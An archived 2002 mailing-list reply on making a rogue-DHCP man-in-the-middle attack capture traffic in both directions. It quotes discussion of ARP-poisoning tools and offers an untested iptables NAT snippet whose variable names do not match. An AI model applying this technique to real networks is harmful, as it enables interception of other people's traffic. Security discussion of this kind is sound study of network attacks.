Apologies for the long delay on this almost-dead thread ... At 12:02am Sep 21 rootat_private wrote: //snip > A couple of problems with the man in the middle attack > ------------------------------------------------------ //snip > Another problem with the attack is that it would only be a one > way attack as the default gateway assigned by the rogue DHCP > server is not the real default gateway. The fake gateway would > need to sniff the packets and rewrite the MAC layer to enable > the packets to be sent to the correct default gateway. The > problem would occur with packets being sent from the correct > default gateway back to the attacked machine as the packets > would not pass through the rogue gateway, thus can not be > sniffed. This basically means that all outgoing traffic can be > sniffed and all incoming traffic can't. > > A full man in the middle attack can be established using > programs such as Dsniff and Ettercap which both utilise ARP > poisoning to establish the man in the middle attack. //snip How about: In order to obtain incoming and outgoing traffic, the fake gateway assigns the victim an IP address on an unused private subnet, and NATs the traffic to and from the victim. #! /untested/code DHCPASSIGNED=192.168.155.3 # What the real DHCP server assigned PRIVIP=172.16.155.3 # What the fake server assigned iptables -t nat -A PREROUTING -d $REAL -j DNAT --to $PRIVIP iptables -t nat -A POSTROUTING -s $PRIVIP -j SNAT --to $REAL (Alternatively, the fake gateway could advertise its route to the victim via RIP for an neater exploit .. I think.) &:-)
This archive was generated by hypermail 2b30 : Fri Oct 04 2002 - 08:54:37 PDT